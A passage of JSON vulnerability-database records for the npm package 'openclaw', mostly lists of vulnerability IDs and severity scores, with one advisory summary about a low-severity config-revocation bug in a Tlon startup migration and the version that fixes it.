                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "GHSA-2j53-2c28-g9v2"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-z3rc-xpx7-fkcu"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90164?format=api",
            "vulnerability_id": "VCID-z7wa-tw2t-vqas",
            "summary": "OpenClaw: Tlon Startup Migration Rehydrates Empty-Array Revocations From File Config\n## Summary\nThe Tlon startup migration treats a setting whose value is an empty array as if the setting were missing, so a revocation expressed as an empty array can be undone when the migration rehydrates the Tlon config from file state after a restart.\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: low\n- Assessment: v2026.3.28 startup migration still treats empty-array settings as missing and can rehydrate revoked Tlon config from file state after restart.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `a4d72a83f01fedd35964c352e3473c7712a3511b` — 2026-03-31T14:57:03+01:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @smaeljaish771 for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41388",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00041",
                            "scoring_system": "epss",
                            "scoring_elements": "0.12844",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00041",
                            "scoring_system": "epss",
                            "scoring_elements": "0.12883",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00041",
                            "scoring_system": "epss",
                            "scoring_elements": "0.12878",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41388"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/a4d72a83f01fedd35964c352e3473c7712a3511b",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:28:29Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/a4d72a83f01fedd35964c352e3473c7712a3511b"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3pm9-5j7m-59vc",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:28:29Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3pm9-5j7m-59vc"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41388",
                    "reference_id": "CVE-2026-41388",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41388"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-3pm9-5j7m-59vc",
                    "reference_id": "GHSA-3pm9-5j7m-59vc",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-3pm9-5j7m-59vc"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-configuration-rehydration-via-empty-array-revocation-handling",
                    "reference_id": "openclaw-configuration-rehydration-via-empty-array-revocation-handling",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:28:29Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-configuration-rehydration-via-empty-array-revocation-handling"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
